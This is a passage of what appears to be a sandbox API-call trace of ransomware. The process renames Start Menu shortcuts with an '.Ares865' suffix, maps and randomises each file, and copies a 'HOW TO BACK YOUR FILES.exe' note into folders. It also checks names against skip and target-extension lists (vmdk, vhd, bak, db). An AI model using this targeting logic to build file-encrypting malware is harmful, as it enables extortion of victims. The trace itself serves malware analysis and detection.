(lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Configure Java.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\configure java.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.412] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1975) returned 1 [0067.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.412] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.413] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.413] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.413] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xac0, lpName=0x0) returned 0x154 [0067.415] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xac0) returned 0x1a0000 [0067.422] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.423] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.423] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.424] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0067.424] CloseHandle (hObject=0x154) returned 1 [0067.424] CloseHandle (hObject=0x120) returned 1 [0067.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.424] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7591eb80, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7591eb80, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7591eb80, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Help.lnk", cAlternateFileName="GETHEL~1.LNK")) returned 1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="aoldtz.exe") returned 1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2=".") returned 1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="..") returned 1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="windows") returned -1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="bootmgr") returned 1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="temp") returned -1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="pagefile.sys") returned -1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="boot") returned 1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="ids.txt") returned -1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="ntuser.dat") returned -1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="perflogs") returned -1 [0067.424] lstrcmpiW (lpString1="Get Help.lnk", lpString2="MSBuild") returned -1 [0067.424] lstrlenW (lpString="Get Help.lnk") returned 12 [0067.424] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Configure Java.lnk") returned 62 [0067.424] lstrcpyW (in: lpString1=0x2cce458, lpString2="Get Help.lnk" | out: lpString1="Get Help.lnk") returned="Get Help.lnk" [0067.424] lstrlenW (lpString="Get Help.lnk") returned 12 [0067.425] lstrlenW (lpString="Ares865") returned 7 [0067.425] lstrcmpiW (lpString1="elp.lnk", lpString2="Ares865") returned 1 [0067.425] lstrlenW (lpString=".dll") returned 4 [0067.425] lstrcmpiW (lpString1="Get Help.lnk", lpString2=".dll") returned 1 [0067.425] lstrlenW (lpString=".lnk") returned 4 [0067.425] lstrcmpiW (lpString1="Get Help.lnk", lpString2=".lnk") returned 1 [0067.425] lstrlenW (lpString=".ini") returned 4 [0067.425] lstrcmpiW (lpString1="Get Help.lnk", lpString2=".ini") returned 1 [0067.425] lstrlenW (lpString=".sys") returned 4 [0067.425] lstrcmpiW (lpString1="Get Help.lnk", lpString2=".sys") returned 1 [0067.425] lstrlenW (lpString="Get Help.lnk") returned 12 [0067.425] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Get Help.lnk.Ares865") returned 64 [0067.425] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Get Help.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\get help.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Get Help.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\get help.lnk.ares865"), dwFlags=0x1) returned 1 [0067.426] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Get Help.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\get help.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.426] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1206) returned 1 [0067.426] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.427] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.427] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.427] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.427] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.427] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.428] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x154 [0067.430] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x190000 [0067.430] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.431] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.431] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.432] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.432] CloseHandle (hObject=0x154) returned 1 [0067.432] CloseHandle (hObject=0x120) returned 1 [0067.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.432] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bba58c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.432] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.432] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x758f8a20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x758f8a20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7591eb80, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Visit Java.com.lnk", cAlternateFileName="VISITJ~1.LNK")) returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="aoldtz.exe") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2=".") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="..") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="windows") returned -1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="bootmgr") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="temp") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="pagefile.sys") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="boot") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="ids.txt") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="ntuser.dat") returned 1 [0067.432] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="perflogs") returned 1 [0067.433] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2="MSBuild") returned 1 [0067.433] lstrlenW (lpString="Visit Java.com.lnk") returned 18 [0067.433] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Get Help.lnk") returned 56 [0067.433] lstrcpyW (in: lpString1=0x2cce458, lpString2="Visit Java.com.lnk" | out: lpString1="Visit Java.com.lnk") returned="Visit Java.com.lnk" [0067.433] lstrlenW (lpString="Visit Java.com.lnk") returned 18 [0067.433] lstrlenW (lpString="Ares865") returned 7 [0067.433] lstrcmpiW (lpString1="com.lnk", lpString2="Ares865") returned 1 [0067.433] lstrlenW (lpString=".dll") returned 4 [0067.433] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2=".dll") returned 1 [0067.433] lstrlenW (lpString=".lnk") returned 4 [0067.433] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2=".lnk") returned 1 [0067.433] lstrlenW (lpString=".ini") returned 4 [0067.433] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2=".ini") returned 1 [0067.433] lstrlenW (lpString=".sys") returned 4 [0067.433] lstrcmpiW (lpString1="Visit Java.com.lnk", lpString2=".sys") returned 1 [0067.433] lstrlenW (lpString="Visit Java.com.lnk") returned 18 [0067.434] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Visit Java.com.lnk.Ares865") returned 70 [0067.434] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Visit Java.com.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\visit java.com.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Visit Java.com.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\visit java.com.lnk.ares865"), dwFlags=0x1) returned 1 [0067.471] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Visit Java.com.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\visit java.com.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.476] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1114) returned 1 [0067.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.480] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.480] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.482] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.483] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.483] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.486] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x154 [0067.493] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x190000 [0067.500] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.502] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.502] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.523] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.523] CloseHandle (hObject=0x154) returned 1 [0067.523] CloseHandle (hObject=0x12c) returned 1 [0067.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.523] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x758f8a20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x758f8a20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7591eb80, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Visit Java.com.lnk", cAlternateFileName="VISITJ~1.LNK")) returned 0 [0067.523] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0067.523] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2568 [0067.523] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Games", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Games") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Games" [0067.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0067.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0067.523] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Games") returned 44 [0067.523] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Games" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Games") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Games" [0067.524] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.524] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\games\\how to back your files.exe"), bFailIfExists=1) returned 0 [0067.524] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0067.524] GetLastError () returned 0x0 [0067.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0067.524] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0067.524] CloseHandle (hObject=0x15c) returned 1 [0067.524] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0067.524] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.524] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bba58c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.525] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.525] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.525] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.525] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bba58c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.525] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.525] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.525] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.525] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.525] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8e194aab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8e194aab, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x208, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0067.525] lstrlenW (lpString="desktop.ini") returned 11 [0067.525] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\*") returned 46 [0067.525] lstrcpyW (in: lpString1=0x2cce45a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0067.525] lstrlenW (lpString="desktop.ini") returned 11 [0067.525] lstrlenW (lpString="Ares865") returned 7 [0067.525] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0067.525] lstrlenW (lpString=".dll") returned 4 [0067.525] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0067.525] lstrlenW (lpString=".lnk") returned 4 [0067.526] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0067.526] lstrlenW (lpString=".ini") returned 4 [0067.526] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0067.526] lstrlenW (lpString=".sys") returned 4 [0067.526] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0067.526] lstrlenW (lpString="desktop.ini") returned 11 [0067.526] lstrlenW (lpString="bak") returned 3 [0067.526] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0067.526] lstrlenW (lpString="ba_") returned 3 [0067.526] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0067.526] lstrlenW (lpString="dbb") returned 3 [0067.526] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0067.526] lstrlenW (lpString="vmdk") returned 4 [0067.526] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0067.526] lstrlenW (lpString="rar") returned 3 [0067.526] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0067.526] lstrlenW (lpString="zip") returned 3 [0067.526] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0067.526] lstrlenW (lpString="tgz") returned 3 [0067.526] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0067.526] lstrlenW (lpString="vbox") returned 4 [0067.526] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0067.526] lstrlenW (lpString="vdi") returned 3 [0067.526] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0067.526] lstrlenW (lpString="vhd") returned 3 [0067.526] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0067.526] lstrlenW (lpString="vhdx") returned 4 [0067.526] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0067.526] lstrlenW (lpString="avhd") returned 4 [0067.526] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0067.526] lstrlenW (lpString="db") returned 2 [0067.526] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0067.526] lstrlenW (lpString="db2") returned 3 [0067.526] 